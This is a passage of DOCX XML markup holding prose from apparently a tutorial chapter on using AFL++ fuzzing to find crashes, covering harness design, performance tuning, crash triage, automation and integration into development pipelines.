        <w:t xml:space="preserve">You’ve learned how to build and curate effective seed corpora that maximize AFL++ crash discovery while optimizing performance for practical fuzzing campaigns.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now let’s create harnesses that focus this discovery power on your specific applications.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:id="129" w:name="X424166596bc1ccbc32540d3fd66bb6f3393a526"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creating Your First Crash-Finding Harness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Harness development transforms AFL++ from a generic fuzzing tool into a precision vulnerability discovery system tailored to your specific application. The harness defines how fuzzer-generated input reaches your target code, making the difference between effective crash discovery and hours of wasted computation exploring irrelevant code paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll master the fundamental harness pattern that remains consistent across all AFL++ applications: initialize your target, read fuzzer input, process the input through your target function, and handle results cleanly. This simplicity enables rapid harness development while maintaining the flexibility needed for complex applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective harnesses exercise realistic code paths that mirror actual application usage patterns. If your production application processes HTTP requests, your harness should simulate request processing workflows. If your application reads configuration files, your harness should mirror configuration loading procedures. The closer your harness matches real usage, the more relevant your crash discoveries become.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll implement persistent mode harnesses that eliminate process startup overhead by keeping your target application loaded in memory between test cases. This optimization typically improves AFL++ throughput by orders of magnitude, enabling discovery of subtle crashes that require extensive input exploration to trigger reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Persistent mode implementation requires careful state management to prevent test case interference. Each fuzzing iteration must start with clean application state, requiring explicit cleanup or state reset between iterations. Memory leaks, file handle exhaustion, and global variable corruption can compromise persistent mode effectiveness if you don’t handle state management properly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your harness instrumentation provides visibility into fuzzing effectiveness through coverage tracking and performance monitoring. Well-instrumented harnesses reveal which code paths AFL++ explores successfully and which areas remain unreachable, guiding corpus improvement and target optimization efforts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input processing optimization focuses AFL++ exploration on the most valuable code paths for vulnerability discovery. Some applications spend significant time in initialization or cleanup code that rarely contains vulnerabilities. You can design harnesses that bypass these areas, concentrating fuzzing effort on input validation and data processing logic where crashes commonly occur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll develop harnesses that handle complex input scenarios involving multiple data sources, stateful processing, and error recovery mechanisms. These advanced patterns enable fuzzing of realistic application behaviors rather than simplified test scenarios that might miss important vulnerability classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve now mastered harness development techniques that focus AFL++ on discovering the crashes that actually threaten your service reliability.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Let’s optimize performance to maximize your crash discovery rate.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="129"/>
    <w:bookmarkStart w:id="130" w:name="X4a68c6625ef0b22dbc6605e48af7089e4ecc127"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance Optimization for Maximum Crash Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AFL++ performance directly impacts crash discovery effectiveness. Faster fuzzing campaigns execute more test cases per hour, increasing the probability of finding rare crash conditions that require extensive exploration to trigger. Performance optimization transforms AFL++ from a slow research tool into a practical development aid that provides rapid feedback on code reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll configure compilation optimization that enables the instrumentation needed for coverage tracking while maintaining execution speed. Modern compilers provide fuzzing-specific optimization flags that balance instrumentation overhead against execution performance. Understanding these options helps you achieve maximum throughput without sacrificing coverage accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory limit tuning prevents AFL++ from exploring code paths that require excessive memory allocation, focusing effort on realistic usage scenarios that actually occur in production. Applications that can allocate unbounded memory often contain denial-of-service vulnerabilities, but fuzzing these conditions can exhaust system resources without discovering exploitable crashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll configure CPU affinity to ensure AFL++ processes receive dedicated computing resources without competing with other system processes. On multi-core systems, proper CPU affinity can double or triple fuzzing throughput by eliminating context switching overhead and cache pollution that degrades performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parallel fuzzing multiplies crash discovery throughput by running multiple AFL++ instances simultaneously with different exploration strategies. You’ll configure some instances to focus on deep exploration of known coverage areas while others prioritize breadth-first exploration of new code regions. This diversity increases the probability of discovering rare crash conditions that single-instance campaigns might miss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance monitoring reveals bottlenecks that limit fuzzing effectiveness and guide optimization efforts. AFL++ provides detailed statistics about mutation strategies, coverage discovery rates, and execution speed that help you identify configuration improvements and resource constraints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll establish performance baselines for your fuzzing campaigns and track improvements as you optimize configurations. This measurement-driven approach ensures your optimization efforts produce measurable benefits rather than theoretical improvements that don’t translate to increased crash discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The performance optimization process continues throughout fuzzing campaigns as you respond to discovered bottlenecks and coverage plateaus. Initial optimization focuses on basic configuration tuning, while later optimization responds to specific performance characteristics revealed during extended campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve learned to optimize AFL++ performance for maximum crash discovery throughput while maintaining the coverage accuracy needed for effective vulnerability discovery.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now let’s analyze the crashes you discover to understand their reliability impact.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkStart w:id="131" w:name="X8fa00c39c79bfbfd2ef3f96d989ab9eacf9fe3c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crash Analysis and Reliability Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Raw crashes provide little value without systematic analysis that transforms them into actionable reliability improvements. You need to determine which crashes represent genuine threats to service stability and which constitute theoretical vulnerabilities with minimal practical impact on production operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact assessment begins with crash reproducibility verification using the exact inputs that AFL++ discovered. You must verify that crashes occur consistently across different environments and configurations, ruling out environmental factors that might mask or amplify crash impact. Flaky crashes that occur sporadically often indicate race conditions or environmental dependencies that complicate remediation efforts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll classify crashes by vulnerability type to guide remediation priorities and response strategies effectively. Buffer overflows in request processing code threaten immediate service availability and require urgent attention. Memory leaks that accumulate gradually can cause service degradation over extended periods but might tolerate delayed remediation. Integer overflow conditions might enable denial-of-service attacks through resource exhaustion but could require specific triggering conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitability analysis determines whether crashes can be weaponized by attackers to compromise system security beyond simple service disruption. Memory corruption vulnerabilities that provide control over program execution represent critical security risks that demand immediate remediation. Crashes that cause immediate service termination might enable denial-of-service attacks but don’t necessarily provide deeper system access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll understand how crashes manifest differently in production environments compared to development systems. Development environments often include debugging tools and safety mechanisms that mask crash impact. Production systems typically lack these protections, making crashes more severe and more likely to cause complete service outages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Root cause analysis traces crashes back to their underlying programming errors, enabling comprehensive fixes rather than superficial patches that might miss related vulnerabilities. Many crashes result from subtle interactions between multiple code paths, requiring careful analysis to understand the complete failure scenario and prevent similar issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated triage systems process large numbers of AFL++ crashes to identify the most critical vulnerabilities for manual analysis. These systems use crash characteristics, stack trace analysis, and impact heuristics to prioritize crashes by probable severity, enabling efficient allocation of analysis resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll develop crash signature generation techniques that create unique identifiers for distinct crashes, enabling automatic deduplication of repeated failures. Many AFL++ campaigns discover the same underlying bug through multiple different inputs, and signature-based deduplication groups related crashes together to prevent duplicate analysis effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You now understand how to analyze AFL++ crashes systematically to determine their reliability impact and prioritize remediation efforts for maximum service stability improvement.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Let’s build systems that automate this analysis at scale.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkStart w:id="132" w:name="X3ea5e224c3717eb8024c6b51d82e864deb84903"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building Automated Crash Detection Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual crash analysis doesn’t scale to the thousands of crashes that effective fuzzing campaigns can discover. You need automated detection systems that process crash dumps, classify vulnerabilities, and prioritize analysis efforts, transforming overwhelming crash volumes into manageable action items that focus human attention on the most critical issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll implement crash signature generation that creates unique identifiers for each distinct crash, enabling automatic deduplication of repeated failures. Many AFL++ campaigns discover the same underlying bug through multiple different inputs, and effective deduplication prevents wasteful duplicate analysis while ensuring you don’t miss distinct vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Severity classification algorithms analyze crash characteristics to estimate vulnerability impact without requiring immediate manual review. Stack trace analysis, memory violation type, and code context provide sufficient information for initial triage in most cases. This automation enables immediate response to critical crashes while queuing less severe issues for later detailed analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration with development workflows ensures crash discoveries trigger appropriate response processes without overwhelming development teams with irrelevant notifications. Critical crashes might automatically create high-priority tickets in bug tracking systems with detailed reproduction instructions. Less severe crashes could be batched into daily or weekly reports that provide awareness without disrupting immediate development priorities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll configure notification systems that alert developers immediately when AFL++ discovers crashes that threaten service reliability. The notification threshold should balance responsiveness against alert fatigue—​too many notifications reduce effectiveness by training developers to ignore alerts, while too few notifications delay critical issue response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuous monitoring tracks fuzzing campaign progress and crash discovery rates over time, providing insights into code quality trends and fuzzing effectiveness. Declining crash discovery might indicate coverage saturation or the need for corpus updates. Sudden increases in crash frequency could signal the introduction of new vulnerabilities through recent code changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quality assurance mechanisms ensure automated systems maintain accuracy over time without generating false positives that erode developer trust. You’ll implement feedback loops that allow manual classification to improve automated algorithms, and validation procedures that verify system accuracy against known crash characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The automated system preserves all raw crash data while providing filtered views tailored to different stakeholder needs. Developers receive actionable reports focused on crashes in their code areas. Security teams get summaries of exploitable vulnerabilities. Management receives high-level trends and risk assessments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve built automated systems that scale crash analysis to handle the volume of discoveries that effective fuzzing campaigns generate while focusing human attention on the most critical reliability threats.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now let’s establish workflows that sustain these capabilities over time.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkStart w:id="133" w:name="X2ee3d96176e7167e0e1ea81501313a5a0da25d0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establishing Fuzzing Workflows That Scale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Individual fuzzing successes mean little without sustainable workflows that integrate crash discovery into regular development practices. You need scalable workflows that automate the routine aspects of fuzzing while preserving human judgment for complex analysis and remediation decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your workflow begins with automatic target identification when code changes affect input processing logic. Version control hooks can trigger fuzzing campaigns for modified parsers, network protocols, or data validation functions. This automation ensures new vulnerabilities get discovered quickly after introduction rather than accumulating silently until production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuzzing campaign management balances resource allocation across multiple targets and priorities effectively. Critical applications might receive continuous fuzzing attention to catch regressions immediately. Less critical components get periodic testing that provides adequate coverage without consuming excessive resources. Resource allocation should reflect business impact and attack surface exposure rather than arbitrary technical preferences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result processing workflows handle the substantial volume of data that successful fuzzing campaigns generate without overwhelming analysis capacity. Automated systems process routine crashes using established classification criteria, while human analysts focus on complex cases that require judgment about exploitability, impact, or remediation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll implement quality assurance procedures that ensure fuzzing campaigns maintain effectiveness over time without degrading due to configuration drift or environmental changes. Coverage analysis reveals whether campaigns explore sufficient code paths to discover relevant vulnerabilities. Performance monitoring identifies bottlenecks that limit throughput and reduce discovery effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regular corpus updates prevent campaigns from becoming stale and missing new vulnerability classes introduced through code evolution. You’ll establish procedures for incorporating new input samples, removing obsolete corpus entries, and adapting fuzzing strategies to reflect application changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Documentation captures the rationale behind workflow decisions and analysis procedures, enabling knowledge transfer and consistency across team members. Future team members can understand why particular targets receive priority, how crash analysis proceeds, and what constitutes actionable vulnerabilities requiring immediate attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The workflow improvement process continuously refines procedures based on accumulated experience and results. Teams that fuzz regularly develop institutional knowledge about effective techniques, target selection criteria, and analysis procedures that improve over time. Capturing this knowledge in repeatable workflows prevents expertise loss during team transitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve established sustainable workflows that integrate fuzzing into development practices while scaling to handle multiple applications and team members effectively.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Let’s see how this foundation enables integration with your existing development processes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:id="134" w:name="X7b64e8a02d8813081119c4b69c65aa1c5fa2f32"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration with Development Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuzzing provides maximum value when integrated seamlessly into existing development processes rather than operating as an isolated security activity. Your integration approach should enhance development velocity by catching crashes early, rather than slowing development through additional process overhead that discourages adoption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pre-commit fuzzing identifies crashes before they enter the main codebase, preventing other developers from encountering known reliability issues during their development work. The fuzzing duration must balance coverage against development speed—​five-minute campaigns might catch obvious regressions without significantly delaying commits, while longer campaigns require asynchronous execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuous integration pipelines include fuzzing stages that run longer campaigns against stable code versions after initial integration testing passes. These campaigns have more time to explore complex crash conditions while providing feedback about code reliability trends over time. You’ll configure appropriate failure thresholds that distinguish between critical crashes requiring immediate attention and minor issues that can wait for scheduled maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Release validation includes fuzzing campaigns that verify new versions don’t introduce reliability regressions while maintaining or improving overall crash resistance. These campaigns combine regression testing of previously discovered crashes with exploration for new vulnerabilities that might have been introduced. The validation process prevents known crashes from reaching production while discovering new issues before customer impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post-deployment monitoring can trigger fuzzing campaigns when production systems exhibit unexpected behavior patterns that suggest underlying reliability issues. Crashes or performance anomalies in production might indicate input patterns that warrant systematic investigation. Fuzzing can systematically explore these patterns to identify underlying vulnerabilities before they cause widespread service disruption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Developer training ensures team members understand how to interpret fuzzing results and integrate crash analysis into their debugging workflows effectively. Fuzzing becomes most effective when developers can independently analyze simple crashes and escalate complex cases appropriately, rather than requiring specialized security expertise for all crash investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The feedback loop between fuzzing results and development practices improves code quality over time through accumulated learning. Developers who regularly see crashes in their code develop intuition about vulnerability-prone patterns and coding practices that reduce future vulnerability introduction. This learning enhances code review effectiveness and architectural decision-making.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve integrated fuzzing into your development lifecycle in ways that enhance reliability without disrupting productivity, creating sustainable practices that improve over time.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now let’s consolidate what you’ve accomplished and look ahead to expanding your capabilities.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="135" w:name="X346840346f5d9615f1a9900e46085f15667430d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Fuzzing Foundation is Complete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve now experienced the complete cycle of vulnerability discovery using AFL++: setting up professional fuzzing environments, configuring effective campaigns, discovering real crashes, and analyzing their impact on service reliability. This hands-on experience provides the solid foundation for everything that follows in your exploration of modern fuzzing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The crash you discovered in this chapter represents just the beginning of what systematic fuzzing can accomplish. Modern applications contain dozens or hundreds of similar vulnerabilities waiting to be discovered through patient, systematic exploration. Each crash you find and fix makes your applications more reliable and your users' experience more stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The skills you’ve developed transfer directly to production fuzzing campaigns that protect real services. Harness creation techniques apply to any application that processes external input. Corpus curation strategies work across different input formats and protocols. Crash analysis procedures handle vulnerabilities regardless of their specific technical characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perhaps most importantly, you’ve gained confidence in fuzzing as a practical development tool rather than an academic research technique. AFL++ isn’t magic—​it’s systematic exploration guided by coverage feedback and optimized through careful configuration. Understanding this process demystifies fuzzing and enables you to apply it effectively across diverse applications and scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The investment you’ve made in learning AFL++ will pay dividends throughout your development career. Every application you build, every parser you write, every input handler you implement can benefit from systematic crash discovery. The techniques become second nature with practice, eventually requiring minimal additional effort to maintain continuous vulnerability discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve built workflows that scale beyond individual experimentation to team-wide adoption and organizational integration. The Docker environments, analysis procedures, and automation systems you’ve implemented provide the infrastructure needed to sustain fuzzing programs as your applications and teams grow.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="X5dafab503e9952e35d0a37a22e6fea038e8ccbb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Take Action on Your New Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your next step is applying these techniques to your own applications rather than the artificial examples used for learning. Choose an application that processes external input—​a web service endpoint, a configuration file parser, or a data processing pipeline. Build a harness using the patterns you’ve mastered, create a seed corpus that exercises diverse code paths, and launch your first production-relevant fuzzing campaign.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with a modest goal: run AFL++ for an hour and analyze whatever crashes you discover. Don’t worry about finding dozens of vulnerabilities immediately—​focus on applying the complete workflow from setup through analysis. This practical application will reinforce your learning while providing immediate value to your application’s reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document your experience as you apply these techniques to real applications. What harness patterns work best for your specific input formats? Which corpus curation strategies provide the most effective coverage? How do you integrate crash analysis into your existing debugging workflows? This documentation becomes institutional knowledge that benefits your entire team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Share your discoveries with your development team, but frame them in terms of reliability improvement rather than security vulnerabilities. Emphasize how fuzzing prevents production outages and improves user experience rather than focusing on theoretical attack scenarios. This framing encourages adoption and integration rather than defensive responses.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="137" w:name="X2b4cd4a5575c94416e7ecaab770f05125a599e4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond Basic Crash Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter focused on the fundamentals of finding memory corruption vulnerabilities using AFL++. Real applications require additional techniques to discover the full spectrum of reliability issues that can cause service outages. Input validation failures, logic errors, performance vulnerabilities, and resource exhaustion conditions all threaten service stability in ways that basic crash discovery might miss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve mastered AFL++ for finding memory corruption bugs—​buffer overflows, use-after-free conditions, and integer overflows that cause immediate crashes. These discoveries provide tremendous value, but they represent only one category of reliability threats facing modern applications. Your services can fail in many ways that don’t trigger segmentation faults or memory violations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider applications that hang indefinitely when processing certain inputs, consuming CPU resources without making progress. Traditional crash discovery won’t find these denial-of-service conditions because the application never actually crashes—​it just becomes unresponsive. Or think about logic errors that cause data corruption without triggering memory safety violations. These bugs can compromise service integrity while remaining completely invisible to memory-focused fuzzing approaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
